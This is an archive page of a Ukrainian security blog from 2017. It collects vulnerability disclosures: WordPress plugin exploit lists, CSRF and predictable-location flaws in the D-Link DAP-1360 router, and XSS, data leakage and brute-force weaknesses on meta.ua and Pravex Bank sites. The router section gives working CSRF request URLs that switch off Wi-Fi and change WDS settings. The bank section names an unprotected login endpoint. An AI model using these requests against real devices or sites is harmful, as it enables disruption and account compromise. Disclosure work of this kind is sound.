Архів для категорії 'Уразливості'
Уразливості в плагінах для WordPress №247
20:09 30.03.2017Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Monetize, Video Gallery, WP Symposium, iframe, OAuth2 Complete. Для котрих з’явилися експлоіти.
- WordPress Monetize 1.03 Cross Site Request Forgery / Cross Site Scripting (деталі)
- WordPress Video Gallery 2.7 SQL Injection (деталі)
- WordPress WP Symposium 15.1 SQL Injection (деталі)
- WordPress iframe 3.0 Stored Cross Site Scripting (деталі)
- WordPress OAuth2 Complete 3.1.3 Insecure Random (деталі)
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
Добірка уразливостей
16:22 29.03.2017Уразливості в плагінах для WordPress №246
23:55 04.03.2017Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах Recent Backups, WPTF Image Gallery, Avenir-Soft Direct Download, Bookmarkify та в WordPress. Для котрих з’явилися експлоіти.
- WordPress Recent Backups 0.7 File Download (деталі)
- WordPress WPTF Image Gallery 1.03 File Download (деталі)
- WordPress 3.8.1 / 3.8.2 / 4.2.2 Cross Site Request Forgery (деталі)
- WordPress Avenir-Soft Direct Download 1.0 XSS / CSRF (деталі)
- WordPress Bookmarkify 2.9.2 Cross Site Request Forgery / Cross Site Scripting (деталі)
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
PRL і CSRF уразливості в D-Link DAP-1360
23:52 03.03.2017Продовжуючи тему уразливостей в D-Link DAP-1360. У січні, 27.01.2016, я виявив нові уразливості в пристрої. Це Predictable Resource Location та Cross-Site Request Forgery уразливості в D-Link DAP-1360 (Wi-Fi Access Point and Router).
Predictable Resource Location (WASC-34):
Якщо використовувати D-Link DAP-1360 в якості роутера, до можливий доступ до адмінки за адресою http://dlink.ap. Дана адреса застосовується в різних пристроях D-Link з функцією роутера. Це полегшує CSRF та XSS атаки - всі, про які писав в цій та попередніх публікаціях. Бо зміна IP вже не захистить і можна віддалено проводити CSRF атаки використовуючи ім’я домену.
CSRF (WASC-09):
Зокрема можна вимкнути Wi-Fi. При цьому зміна IP з дефолтного 192.168.0.50 на іншій не допоможе.
http://dlink.ap/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=39&res_struct_size=0&res_buf={%22Radio%22:false,%22mbssidNum%22:1,%22mbssidCur%22:1}
CSRF (WASC-09):
В розділі Wi-Fi - WDS можна змінити параметр WDS Mode:
Вимкнути - Disable:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%220%22}}
Увімкнути - Bridge mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%222%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}
Увімкнути - Repeater mode:
http://192.168.0.50/index.cgi?v2=y&rq=y&res_json=y&res_data_type=json&res_config_action=3&res_config_id=109&res_struct_size=0&res_buf={%22wds%22:{%22WdsEnable%22:%223%22,%22WdsPhyMode%22:%22CCK%22,%22WdsEncrypType%22:%22WEP%22,%22WdsKey%22:%22wfkey%22,%22Wds1Mac%22:%22%22,%22Wds2Mac%22:%22%22,%22Wds3Mac%22:%22%22,%22Wds4Mac%22:%22%22}}
Уразлива версія D-Link DAP-1360, Firmware 1.0.0. Дана модель з іншими прошивками також повинна бути вразливою.
Добірка уразливостей
17:21 03.03.2017В даній добірці уразливості в веб додатках:
Уразливості на stat24.meta.ua
23:58 02.03.2017Ще 23.02.2007 я знайшов Cross-Site Scripting та Information Leakage уразливості на сайтах stat24.meta.ua. Як я вже розповідав, після останнього разу, коли вони відповіли мені дуже несерйозним чином, я більше не сповіщаю Мету про дірки на їхніх сайтах.
Останнього разу стосовно проектів компанії Мета я писав про уразливості на blog.meta.ua та market.auto.meta.ua.
XSS:
Information Leakage:
На деяких сторінках сайту були розміщені логіни та хеші паролів користувачів, що були доступні всім без авторизації.
Уразливості вже виправлені, але вони зробили це лише через багато років. І це є типовим явищем для сайтів Мети, що добре видно з тих багатьох дірок на багатьох сайтах Мети про які я розповідав раніше.
Добірка уразливостей
17:21 01.03.2017В даній добірці уразливості в веб додатках:
Уразливості в плагінах для WordPress №246
23:50 28.02.2017Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.
Цього разу повідомляю про уразливості в плагінах qTranslate, Job Manager, Filedownload, Candidate Application Form, Simple Image Manipulator. Для котрих з’явилися експлоіти.
- WordPress qTranslate 2.5.39 Cross Site Scripting (деталі)
- WordPress Job Manager 0.7.22 Cross Site Scripting (деталі)
- WordPress Filedownload 1.4 Open Proxy (деталі)
- WordPress Candidate Application Form 1.0 File Download (деталі)
- WordPress Simple Image Manipulator 1.0 File Download (деталі)
Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.
Уразливості на www.pravexonline.com
19:33 28.02.201704.12.2015
В жовтні, 11.10.2012, я знайшов Brute Force та Cross-Site Request Forgery на www.pravexonline.com - це система інтернет-банкінгу Правекс Банку. А також багато інших уразливостей. Про що найближчим часом повідомлю розробникам системи.
Раніше я писав про уразливості на pravex.com. Стосовно уразливостей на сайтах банків останній раз я писав про уразливості на acsk.privatbank.ua.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
28.02.2017
Цей онлайн банкінг доступний на https і використовує самопідписаний SSL сертифікат.
Brute Force:
https://www.pravexonline.com/names.nsf
Немає захисту від BF атак.
Cross-Site Request Forgery:
Відсутність захисту від Brute Force (такого як капча) також призводить до можливості проведення CSRF атаки, про що я писав в статті Атаки на незахищені логін форми. Це дозволяє проводити віддалений логін. Що стане в нагоді при проведенні атак на різні CSRF і XSS уразливості в акаунті.
На сайті використовується IBM Lotus Domino, тому там також можуть бути численні уразливості в Domino, які я виявив у 2012 році.